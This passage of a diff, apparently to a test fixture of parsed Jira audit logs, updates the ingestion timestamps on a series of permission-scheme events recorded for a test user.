"jira.auditing.permission.scheme.created", - "ingested": "2021-12-08T14:50:53.782642184Z", + "ingested": "2021-12-15T09:00:47.652660127Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme created\",\"actionI18nKey\":\"jira.auditing.permission.scheme.created\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Default software scheme\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Default scheme for Software projects.\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":142000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3153,7 +3153,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782644542Z", + "ingested": "2021-12-15T09:00:47.652661046Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Browse Projects\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":151000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3223,7 +3223,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782646928Z", + "ingested": "2021-12-15T09:00:47.652661966Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Create Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":163000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3293,7 +3293,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782649355Z", + "ingested": "2021-12-15T09:00:47.652662884Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Edit Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":165000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3363,7 +3363,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782651707Z", + "ingested": "2021-12-15T09:00:47.652663874Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Assign Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":166000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3433,7 +3433,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782654026Z", + "ingested": "2021-12-15T09:00:47.652664802Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Resolve Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":168000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3503,7 +3503,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782656406Z", + "ingested": "2021-12-15T09:00:47.652665721Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Add Comments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":171000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3573,7 +3573,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782658787Z", + "ingested": "2021-12-15T09:00:47.652666640Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Delete Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":173000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3648,7 +3648,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782661335Z", + "ingested": "2021-12-15T09:00:47.652667686Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Assignable User\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":174000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3718,7 +3718,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782663714Z", + "ingested": "2021-12-15T09:00:47.652668617Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Close Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":176000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3788,7 +3788,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782666099Z", + "ingested": "2021-12-15T09:00:47.652669591Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Create Attachments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":178000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3858,7 +3858,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782668427Z", + "ingested": "2021-12-15T09:00:47.652670546Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Work On Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":180000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3928,7 +3928,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782670787Z", + "ingested": "2021-12-15T09:00:47.652671486Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Link Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":182000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3998,7 +3998,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782673157Z", + "ingested": "2021-12-15T09:00:47.652672398Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Administer Projects\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":184000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -4073,7 +4073,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782675517Z", + "ingested": "2021-12-15T09:00:47.652673346Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Move Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":187000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -4143,7 +4143,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782677860Z", + "ingested": "2021-12-15T09:00:47.652674373Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Schedule Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":190000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -4213,7 +4213,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782680213Z", + "ingested": "2021-12-15T09:00:47.652675293Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Modify Reporter\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":204000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -4288,7 +4288,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782682550Z", + "ingested": "2021-12-15T09:00:47.652676231Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"View Voters and Watchers\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":208000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -4358,7 +4358,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782684879Z", + "ingested": "2021-12-15T09:00:47.652677169Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Manage Watchers\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":210000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -4433,7 +4433,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782687204Z", + "ingested": "2021-12-15T09:00:47.652678159Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Edit All Comments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":212000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -4508,7 +4508,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782689571Z", + "ingested": "2021-12-15T09:00:47.652679109Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Edit Own Comments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":215000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -4578,7 +4578,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782691944Z", + "ingested": "2021-12-15T09:00:47.652698255Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Delete All Comments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":217000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -4653,7 +4653,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782694266Z", + "ingested": "2021-12-15T09:00:47.652699447Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Delete Own Comments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":219000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -4723,7 +4723,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782696622Z", + "ingested": "2021-12-15T09:00:47.652700364Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Delete All Attachments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":221000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -4798,7 +4798,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782698972Z", + "ingested": "2021-12-15T09:00:47.652701272Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme 